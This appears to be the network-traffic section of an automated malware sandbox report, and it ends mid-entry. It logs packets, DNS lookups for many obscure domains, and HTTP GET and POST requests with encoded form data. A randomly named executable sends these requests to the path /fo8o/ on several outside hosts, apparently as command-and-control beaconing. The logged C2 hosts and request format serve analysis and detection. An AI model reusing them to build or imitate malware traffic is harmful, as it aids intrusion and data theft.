Dec 31, 2024 09:30:55.291039944 CET	49725	80	192.168.2.9	91.195.240.94
Dec 31, 2024 09:30:56.308514118 CET	49726	80	192.168.2.9	91.195.240.94
Dec 31, 2024 09:30:56.313519001 CET	80	49726	91.195.240.94	192.168.2.9
Dec 31, 2024 09:30:56.313699007 CET	49726	80	192.168.2.9	91.195.240.94
Dec 31, 2024 09:30:56.318869114 CET	49726	80	192.168.2.9	91.195.240.94
Dec 31, 2024 09:30:56.323683977 CET	80	49726	91.195.240.94	192.168.2.9
Dec 31, 2024 09:30:56.982919931 CET	80	49726	91.195.240.94	192.168.2.9
Dec 31, 2024 09:30:56.982938051 CET	80	49726	91.195.240.94	192.168.2.9
Dec 31, 2024 09:30:56.982947111 CET	80	49726	91.195.240.94	192.168.2.9
Dec 31, 2024 09:30:56.982956886 CET	80	49726	91.195.240.94	192.168.2.9
Dec 31, 2024 09:30:56.982968092 CET	80	49726	91.195.240.94	192.168.2.9
Dec 31, 2024 09:30:56.982980013 CET	80	49726	91.195.240.94	192.168.2.9
Dec 31, 2024 09:30:56.982989073 CET	80	49726	91.195.240.94	192.168.2.9
Dec 31, 2024 09:30:56.982999086 CET	80	49726	91.195.240.94	192.168.2.9
Dec 31, 2024 09:30:56.983011961 CET	80	49726	91.195.240.94	192.168.2.9
Dec 31, 2024 09:30:56.983022928 CET	80	49726	91.195.240.94	192.168.2.9
Dec 31, 2024 09:30:56.983092070 CET	49726	80	192.168.2.9	91.195.240.94
Dec 31, 2024 09:30:56.983138084 CET	49726	80	192.168.2.9	91.195.240.94
Dec 31, 2024 09:30:56.983246088 CET	49726	80	192.168.2.9	91.195.240.94
Dec 31, 2024 09:30:56.988012075 CET	80	49726	91.195.240.94	192.168.2.9
Dec 31, 2024 09:30:56.988023996 CET	80	49726	91.195.240.94	192.168.2.9
Dec 31, 2024 09:30:56.988035917 CET	80	49726	91.195.240.94	192.168.2.9
Dec 31, 2024 09:30:56.988176107 CET	49726	80	192.168.2.9	91.195.240.94
Dec 31, 2024 09:30:57.080538034 CET	80	49726	91.195.240.94	192.168.2.9
Dec 31, 2024 09:30:57.080624104 CET	80	49726	91.195.240.94	192.168.2.9
Dec 31, 2024 09:30:57.080661058 CET	80	49726	91.195.240.94	192.168.2.9
Dec 31, 2024 09:30:57.080694914 CET	80	49726	91.195.240.94	192.168.2.9
Dec 31, 2024 09:30:57.080748081 CET	80	49726	91.195.240.94	192.168.2.9
Dec 31, 2024 09:30:57.080755949 CET	49726	80	192.168.2.9	91.195.240.94
Dec 31, 2024 09:30:57.080782890 CET	80	49726	91.195.240.94	192.168.2.9
Dec 31, 2024 09:30:57.080837965 CET	80	49726	91.195.240.94	192.168.2.9
Dec 31, 2024 09:30:57.080847979 CET	49726	80	192.168.2.9	91.195.240.94
Dec 31, 2024 09:30:57.080873013 CET	80	49726	91.195.240.94	192.168.2.9
Dec 31, 2024 09:30:57.080909014 CET	80	49726	91.195.240.94	192.168.2.9
Dec 31, 2024 09:30:57.080966949 CET	49726	80	192.168.2.9	91.195.240.94
Dec 31, 2024 09:30:57.080966949 CET	49726	80	192.168.2.9	91.195.240.94
Dec 31, 2024 09:30:57.081036091 CET	80	49726	91.195.240.94	192.168.2.9
Dec 31, 2024 09:30:57.081185102 CET	49726	80	192.168.2.9	91.195.240.94
Dec 31, 2024 09:30:57.091224909 CET	49726	80	192.168.2.9	91.195.240.94
Dec 31, 2024 09:30:57.096265078 CET	80	49726	91.195.240.94	192.168.2.9
Dec 31, 2024 09:31:10.278933048 CET	49727	80	192.168.2.9	66.29.149.46
Dec 31, 2024 09:31:10.283842087 CET	80	49727	66.29.149.46	192.168.2.9
Dec 31, 2024 09:31:10.283910036 CET	49727	80	192.168.2.9	66.29.149.46
Dec 31, 2024 09:31:10.286083937 CET	49727	80	192.168.2.9	66.29.149.46
Dec 31, 2024 09:31:10.290868044 CET	80	49727	66.29.149.46	192.168.2.9
Dec 31, 2024 09:31:10.885308981 CET	80	49727	66.29.149.46	192.168.2.9
Dec 31, 2024 09:31:10.885333061 CET	80	49727	66.29.149.46	192.168.2.9
Dec 31, 2024 09:31:10.885488987 CET	49727	80	192.168.2.9	66.29.149.46
Dec 31, 2024 09:31:11.789899111 CET	49727	80	192.168.2.9	66.29.149.46
Dec 31, 2024 09:31:12.808209896 CET	49728	80	192.168.2.9	66.29.149.46
Dec 31, 2024 09:31:12.813222885 CET	80	49728	66.29.149.46	192.168.2.9
Dec 31, 2024 09:31:12.813474894 CET	49728	80	192.168.2.9	66.29.149.46
Dec 31, 2024 09:31:12.815418005 CET	49728	80	192.168.2.9	66.29.149.46
Dec 31, 2024 09:31:12.820348024 CET	80	49728	66.29.149.46	192.168.2.9
Dec 31, 2024 09:31:13.409526110 CET	80	49728	66.29.149.46	192.168.2.9
Dec 31, 2024 09:31:13.409559965 CET	80	49728	66.29.149.46	192.168.2.9
Dec 31, 2024 09:31:13.409624100 CET	49728	80	192.168.2.9	66.29.149.46
Dec 31, 2024 09:31:14.320914984 CET	49728	80	192.168.2.9	66.29.149.46
Dec 31, 2024 09:31:15.339081049 CET	49729	80	192.168.2.9	66.29.149.46
Dec 31, 2024 09:31:15.344006062 CET	80	49729	66.29.149.46	192.168.2.9
Dec 31, 2024 09:31:15.344094992 CET	49729	80	192.168.2.9	66.29.149.46
Dec 31, 2024 09:31:15.347074986 CET	49729	80	192.168.2.9	66.29.149.46
Dec 31, 2024 09:31:15.351905107 CET	80	49729	66.29.149.46	192.168.2.9
Dec 31, 2024 09:31:15.351988077 CET	80	49729	66.29.149.46	192.168.2.9
Dec 31, 2024 09:31:15.958642006 CET	80	49729	66.29.149.46	192.168.2.9
Dec 31, 2024 09:31:15.958748102 CET	80	49729	66.29.149.46	192.168.2.9
Dec 31, 2024 09:31:15.958786011 CET	49729	80	192.168.2.9	66.29.149.46
Dec 31, 2024 09:31:16.852318048 CET	49729	80	192.168.2.9	66.29.149.46
Dec 31, 2024 09:31:17.871145964 CET	49730	80	192.168.2.9	66.29.149.46
Dec 31, 2024 09:31:17.876338959 CET	80	49730	66.29.149.46	192.168.2.9
Dec 31, 2024 09:31:17.876425982 CET	49730	80	192.168.2.9	66.29.149.46
Dec 31, 2024 09:31:17.878235102 CET	49730	80	192.168.2.9	66.29.149.46
Dec 31, 2024 09:31:17.883152962 CET	80	49730	66.29.149.46	192.168.2.9
Dec 31, 2024 09:31:18.475411892 CET	80	49730	66.29.149.46	192.168.2.9
Dec 31, 2024 09:31:18.475440979 CET	80	49730	66.29.149.46	192.168.2.9
Dec 31, 2024 09:31:18.477756977 CET	49730	80	192.168.2.9	66.29.149.46
Dec 31, 2024 09:31:18.483074903 CET	49730	80	192.168.2.9	66.29.149.46
Dec 31, 2024 09:31:18.487921000 CET	80	49730	66.29.149.46	192.168.2.9
Dec 31, 2024 09:31:23.569785118 CET	49731	80	192.168.2.9	195.110.124.133
Dec 31, 2024 09:31:23.574604034 CET	80	49731	195.110.124.133	192.168.2.9
Dec 31, 2024 09:31:23.574680090 CET	49731	80	192.168.2.9	195.110.124.133
Dec 31, 2024 09:31:23.577223063 CET	49731	80	192.168.2.9	195.110.124.133
Dec 31, 2024 09:31:23.582056046 CET	80	49731	195.110.124.133	192.168.2.9
Dec 31, 2024 09:31:24.247057915 CET	80	49731	195.110.124.133	192.168.2.9
Dec 31, 2024 09:31:24.247421026 CET	80	49731	195.110.124.133	192.168.2.9
Dec 31, 2024 09:31:24.247471094 CET	49731	80	192.168.2.9	195.110.124.133
Dec 31, 2024 09:31:25.091078997 CET	49731	80	192.168.2.9	195.110.124.133
Dec 31, 2024 09:31:26.106782913 CET	49732	80	192.168.2.9	195.110.124.133
Dec 31, 2024 09:31:26.111751080 CET	80	49732	195.110.124.133	192.168.2.9
Dec 31, 2024 09:31:26.111840010 CET	49732	80	192.168.2.9	195.110.124.133
Dec 31, 2024 09:31:26.114073992 CET	49732	80	192.168.2.9	195.110.124.133
Dec 31, 2024 09:31:26.118946075 CET	80	49732	195.110.124.133	192.168.2.9
Dec 31, 2024 09:31:26.789151907 CET	80	49732	195.110.124.133	192.168.2.9
Dec 31, 2024 09:31:26.789180994 CET	80	49732	195.110.124.133	192.168.2.9
Dec 31, 2024 09:31:26.789273977 CET	49732	80	192.168.2.9	195.110.124.133
Dec 31, 2024 09:31:27.617846966 CET	49732	80	192.168.2.9	195.110.124.133
Dec 31, 2024 09:31:28.636408091 CET	49733	80	192.168.2.9	195.110.124.133
Dec 31, 2024 09:31:28.641340971 CET	80	49733	195.110.124.133	192.168.2.9
Dec 31, 2024 09:31:28.643389940 CET	49733	80	192.168.2.9	195.110.124.133
Dec 31, 2024 09:31:28.647092104 CET	49733	80	192.168.2.9	195.110.124.133
Dec 31, 2024 09:31:28.651849031 CET	80	49733	195.110.124.133	192.168.2.9
Dec 31, 2024 09:31:28.652008057 CET	80	49733	195.110.124.133	192.168.2.9
Dec 31, 2024 09:31:29.321794033 CET	80	49733	195.110.124.133	192.168.2.9
Dec 31, 2024 09:31:29.322077036 CET	80	49733	195.110.124.133	192.168.2.9
Dec 31, 2024 09:31:29.323168039 CET	49733	80	192.168.2.9	195.110.124.133
Dec 31, 2024 09:31:30.149065018 CET	49733	80	192.168.2.9	195.110.124.133
Dec 31, 2024 09:31:31.170115948 CET	49734	80	192.168.2.9	195.110.124.133
Dec 31, 2024 09:31:31.175012112 CET	80	49734	195.110.124.133	192.168.2.9
Dec 31, 2024 09:31:31.179275990 CET	49734	80	192.168.2.9	195.110.124.133
Dec 31, 2024 09:31:31.189045906 CET	49734	80	192.168.2.9	195.110.124.133
Dec 31, 2024 09:31:31.193952084 CET	80	49734	195.110.124.133	192.168.2.9
Dec 31, 2024 09:31:31.922432899 CET	80	49734	195.110.124.133	192.168.2.9
Dec 31, 2024 09:31:31.922648907 CET	80	49734	195.110.124.133	192.168.2.9
Dec 31, 2024 09:31:31.922692060 CET	49734	80	192.168.2.9	195.110.124.133
Dec 31, 2024 09:31:31.925882101 CET	49734	80	192.168.2.9	195.110.124.133
Dec 31, 2024 09:31:31.930645943 CET	80	49734	195.110.124.133	192.168.2.9
Dec 31, 2024 09:31:53.403134108 CET	49735	80	192.168.2.9	217.196.55.202
Dec 31, 2024 09:31:53.408006907 CET	80	49735	217.196.55.202	192.168.2.9
Dec 31, 2024 09:31:53.408106089 CET	49735	80	192.168.2.9	217.196.55.202
Dec 31, 2024 09:31:53.414555073 CET	49735	80	192.168.2.9	217.196.55.202
Dec 31, 2024 09:31:53.419394016 CET	80	49735	217.196.55.202	192.168.2.9
Dec 31, 2024 09:31:53.988262892 CET	80	49735	217.196.55.202	192.168.2.9
Dec 31, 2024 09:31:53.989526987 CET	80	49735	217.196.55.202	192.168.2.9
Dec 31, 2024 09:31:53.989655018 CET	49735	80	192.168.2.9	217.196.55.202
Dec 31, 2024 09:31:54.914941072 CET	49735	80	192.168.2.9	217.196.55.202
Dec 31, 2024 09:31:55.963468075 CET	49736	80	192.168.2.9	217.196.55.202
Dec 31, 2024 09:31:55.968511105 CET	80	49736	217.196.55.202	192.168.2.9
Dec 31, 2024 09:31:55.968589067 CET	49736	80	192.168.2.9	217.196.55.202
Dec 31, 2024 09:31:55.972460032 CET	49736	80	192.168.2.9	217.196.55.202
Dec 31, 2024 09:31:55.977355957 CET	80	49736	217.196.55.202	192.168.2.9
Dec 31, 2024 09:31:56.527298927 CET	80	49736	217.196.55.202	192.168.2.9
Dec 31, 2024 09:31:56.529725075 CET	80	49736	217.196.55.202	192.168.2.9
Dec 31, 2024 09:31:56.529800892 CET	49736	80	192.168.2.9	217.196.55.202
Dec 31, 2024 09:31:57.477313042 CET	49736	80	192.168.2.9	217.196.55.202
Dec 31, 2024 09:31:58.497632027 CET	49737	80	192.168.2.9	217.196.55.202
Dec 31, 2024 09:31:58.502640963 CET	80	49737	217.196.55.202	192.168.2.9
Dec 31, 2024 09:31:58.503367901 CET	49737	80	192.168.2.9	217.196.55.202
Dec 31, 2024 09:31:58.507144928 CET	49737	80	192.168.2.9	217.196.55.202
Dec 31, 2024 09:31:58.512044907 CET	80	49737	217.196.55.202	192.168.2.9
Dec 31, 2024 09:31:58.512228966 CET	80	49737	217.196.55.202	192.168.2.9
Dec 31, 2024 09:31:59.306493044 CET	80	49737	217.196.55.202	192.168.2.9
Dec 31, 2024 09:31:59.306546926 CET	80	49737	217.196.55.202	192.168.2.9
Dec 31, 2024 09:31:59.306634903 CET	49737	80	192.168.2.9	217.196.55.202
Dec 31, 2024 09:32:00.008563995 CET	49737	80	192.168.2.9	217.196.55.202
Dec 31, 2024 09:32:01.027709961 CET	49738	80	192.168.2.9	217.196.55.202
Dec 31, 2024 09:32:01.032675028 CET	80	49738	217.196.55.202	192.168.2.9
Dec 31, 2024 09:32:01.032955885 CET	49738	80	192.168.2.9	217.196.55.202
Dec 31, 2024 09:32:01.034749985 CET	49738	80	192.168.2.9	217.196.55.202
Dec 31, 2024 09:32:01.039575100 CET	80	49738	217.196.55.202	192.168.2.9
Dec 31, 2024 09:32:01.602961063 CET	80	49738	217.196.55.202	192.168.2.9
Dec 31, 2024 09:32:01.602997065 CET	80	49738	217.196.55.202	192.168.2.9
Dec 31, 2024 09:32:01.603230000 CET	49738	80	192.168.2.9	217.196.55.202
Dec 31, 2024 09:32:01.652237892 CET	49738	80	192.168.2.9	217.196.55.202
Dec 31, 2024 09:32:01.657071114 CET	80	49738	217.196.55.202	192.168.2.9

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 31, 2024 09:28:48.432755947 CET	49736	53	192.168.2.9	1.1.1.1
Dec 31, 2024 09:28:48.879215956 CET	53	49736	1.1.1.1	192.168.2.9
Dec 31, 2024 09:29:04.839937925 CET	55070	53	192.168.2.9	1.1.1.1
Dec 31, 2024 09:29:04.848372936 CET	53	55070	1.1.1.1	192.168.2.9
Dec 31, 2024 09:29:12.933794022 CET	62832	53	192.168.2.9	1.1.1.1
Dec 31, 2024 09:29:13.292684078 CET	53	62832	1.1.1.1	192.168.2.9
Dec 31, 2024 09:29:26.809083939 CET	59069	53	192.168.2.9	1.1.1.1
Dec 31, 2024 09:29:26.818121910 CET	53	59069	1.1.1.1	192.168.2.9
Dec 31, 2024 09:29:35.035373926 CET	53106	53	192.168.2.9	1.1.1.1
Dec 31, 2024 09:29:35.150733948 CET	53	53106	1.1.1.1	192.168.2.9
Dec 31, 2024 09:30:48.700546980 CET	52215	53	192.168.2.9	1.1.1.1
Dec 31, 2024 09:30:48.712812901 CET	53	52215	1.1.1.1	192.168.2.9
Dec 31, 2024 09:31:02.105855942 CET	65425	53	192.168.2.9	1.1.1.1
Dec 31, 2024 09:31:02.115286112 CET	53	65425	1.1.1.1	192.168.2.9
Dec 31, 2024 09:31:10.169174910 CET	53381	53	192.168.2.9	1.1.1.1
Dec 31, 2024 09:31:10.276288986 CET	53	53381	1.1.1.1	192.168.2.9
Dec 31, 2024 09:31:23.498161077 CET	61941	53	192.168.2.9	1.1.1.1
Dec 31, 2024 09:31:23.566673040 CET	53	61941	1.1.1.1	192.168.2.9
Dec 31, 2024 09:31:36.934079885 CET	63738	53	192.168.2.9	1.1.1.1
Dec 31, 2024 09:31:36.944775105 CET	53	63738	1.1.1.1	192.168.2.9
Dec 31, 2024 09:31:45.105845928 CET	63394	53	192.168.2.9	1.1.1.1
Dec 31, 2024 09:31:45.114768982 CET	53	63394	1.1.1.1	192.168.2.9
Dec 31, 2024 09:31:53.203140020 CET	58222	53	192.168.2.9	1.1.1.1
Dec 31, 2024 09:31:53.398921013 CET	53	58222	1.1.1.1	192.168.2.9
Dec 31, 2024 09:32:06.668941975 CET	60408	53	192.168.2.9	1.1.1.1
Dec 31, 2024 09:32:06.678005934 CET	53	60408	1.1.1.1	192.168.2.9
Dec 31, 2024 09:32:14.731220007 CET	53482	53	192.168.2.9	1.1.1.1
Dec 31, 2024 09:32:14.748337030 CET	53	53482	1.1.1.1	192.168.2.9
Dec 31, 2024 09:32:22.809180021 CET	50450	53	192.168.2.9	1.1.1.1
Dec 31, 2024 09:32:22.819001913 CET	53	50450	1.1.1.1	192.168.2.9

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 31, 2024 09:28:48.432755947 CET	192.168.2.9	1.1.1.1	0xbae5	Standard query (0)	www.3xfootball.com	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:29:04.839937925 CET	192.168.2.9	1.1.1.1	0x8e45	Standard query (0)	www.kasegitai.tokyo	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:29:12.933794022 CET	192.168.2.9	1.1.1.1	0x8725	Standard query (0)	www.goldenjade-travel.com	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:29:26.809083939 CET	192.168.2.9	1.1.1.1	0xe6bf	Standard query (0)	www.antonio-vivaldi.mobi	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:29:35.035373926 CET	192.168.2.9	1.1.1.1	0x7b72	Standard query (0)	www.magmadokum.com	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:30:48.700546980 CET	192.168.2.9	1.1.1.1	0x7db6	Standard query (0)	www.rssnewscast.com	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:31:02.105855942 CET	192.168.2.9	1.1.1.1	0xdae8	Standard query (0)	www.liangyuen528.com	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:31:10.169174910 CET	192.168.2.9	1.1.1.1	0x70a	Standard query (0)	www.techchains.info	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:31:23.498161077 CET	192.168.2.9	1.1.1.1	0xb9c0	Standard query (0)	www.elettrosistemista.zip	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:31:36.934079885 CET	192.168.2.9	1.1.1.1	0x604a	Standard query (0)	www.donnavariedades.com	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:31:45.105845928 CET	192.168.2.9	1.1.1.1	0xc21e	Standard query (0)	www.660danm.top	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:31:53.203140020 CET	192.168.2.9	1.1.1.1	0xfaed	Standard query (0)	www.empowermedeco.com	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:32:06.668941975 CET	192.168.2.9	1.1.1.1	0x697e	Standard query (0)	www.joyesi.xyz	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:32:14.731220007 CET	192.168.2.9	1.1.1.1	0xfa35	Standard query (0)	www.k9vyp11no3.cfd	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:32:22.809180021 CET	192.168.2.9	1.1.1.1	0x871f	Standard query (0)	www.shenzhoucui.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 31, 2024 09:28:48.879215956 CET	1.1.1.1	192.168.2.9	0xbae5	No error (0)	www.3xfootball.com		154.215.72.110	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:29:04.848372936 CET	1.1.1.1	192.168.2.9	0x8e45	Name error (3)	www.kasegitai.tokyo	none	none	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:29:13.292684078 CET	1.1.1.1	192.168.2.9	0x8725	No error (0)	www.goldenjade-travel.com		116.50.37.244	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:29:26.818121910 CET	1.1.1.1	192.168.2.9	0xe6bf	Name error (3)	www.antonio-vivaldi.mobi	none	none	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:29:35.150733948 CET	1.1.1.1	192.168.2.9	0x7b72	No error (0)	www.magmadokum.com	redirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 31, 2024 09:29:35.150733948 CET	1.1.1.1	192.168.2.9	0x7b72	No error (0)	redirect.natrocdn.com	natroredirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 31, 2024 09:29:35.150733948 CET	1.1.1.1	192.168.2.9	0x7b72	No error (0)	natroredirect.natrocdn.com		85.159.66.93	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:30:48.712812901 CET	1.1.1.1	192.168.2.9	0x7db6	No error (0)	www.rssnewscast.com		91.195.240.94	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:31:02.115286112 CET	1.1.1.1	192.168.2.9	0xdae8	Name error (3)	www.liangyuen528.com	none	none	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:31:10.276288986 CET	1.1.1.1	192.168.2.9	0x70a	No error (0)	www.techchains.info		66.29.149.46	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:31:23.566673040 CET	1.1.1.1	192.168.2.9	0xb9c0	No error (0)	www.elettrosistemista.zip	elettrosistemista.zip		CNAME (Canonical name)	IN (0x0001)	false
Dec 31, 2024 09:31:23.566673040 CET	1.1.1.1	192.168.2.9	0xb9c0	No error (0)	elettrosistemista.zip		195.110.124.133	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:31:36.944775105 CET	1.1.1.1	192.168.2.9	0x604a	Name error (3)	www.donnavariedades.com	none	none	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:31:45.114768982 CET	1.1.1.1	192.168.2.9	0xc21e	Name error (3)	www.660danm.top	none	none	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:31:53.398921013 CET	1.1.1.1	192.168.2.9	0xfaed	No error (0)	www.empowermedeco.com	empowermedeco.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 31, 2024 09:31:53.398921013 CET	1.1.1.1	192.168.2.9	0xfaed	No error (0)	empowermedeco.com		217.196.55.202	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:32:06.678005934 CET	1.1.1.1	192.168.2.9	0x697e	Name error (3)	www.joyesi.xyz	none	none	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:32:14.748337030 CET	1.1.1.1	192.168.2.9	0xfa35	Name error (3)	www.k9vyp11no3.cfd	none	none	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:32:22.819001913 CET	1.1.1.1	192.168.2.9	0x871f	Name error (3)	www.shenzhoucui.com	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.3xfootball.com

www.goldenjade-travel.com

www.magmadokum.com

www.rssnewscast.com

www.techchains.info

www.elettrosistemista.zip

www.empowermedeco.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49710	154.215.72.110	80	3852	C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:28:48.893776894 CET	501	OUT	GET /fo8o/?D0=YnO0xF1X40&BR14=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnj6KtR967KJkZjHO4n68kz2fsmRVZ8Q== HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.3xfootball.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Dec 31, 2024 09:28:49.799285889 CET	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 31 Dec 2024 08:28:49 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49712	116.50.37.244	80	3852	C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:29:13.302051067 CET	788	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.goldenjade-travel.com Origin: http://www.goldenjade-travel.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 193 Referer: http://www.goldenjade-travel.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 42 52 31 34 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4b 65 73 4d 4c 77 6e 74 6b 63 45 31 2b 61 49 63 6f 52 36 64 71 4d 45 4c 35 73 65 2f 4a 2f 34 67 4d 70 64 73 71 50 73 32 2f 73 43 39 6a 37 30 39 63 4b 2f 45 2f 7a 69 79 36 4e 4a 44 48 74 37 63 4b 6f 54 4e 62 4e 2f 53 68 78 59 46 6f 58 49 44 71 59 6f 55 62 37 2b 37 47 5a 56 62 57 32 55 47 43 63 58 30 4a 68 4c 59 6e 5a 50 58 32 76 76 30 79 6f 5a 4c 72 4e 6b 43 44 61 4f 77 5a 50 65 6f 6b 33 6c 4c 70 2b 36 45 49 54 62 77 66 66 66 57 47 32 62 66 50 50 79 59 69 4b 42 38 36 6c 7a 63 5a 6b 61 77 50 58 34 75 59 6e 62 56 47 42 5a 47 Data Ascii: BR14=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfPPyYiKB86lzcZkawPX4uYnbVGBZG
Dec 31, 2024 09:29:14.169528008 CET	492	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Tue, 31 Dec 2024 08:29:13 GMT Connection: close Content-Length: 315 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML 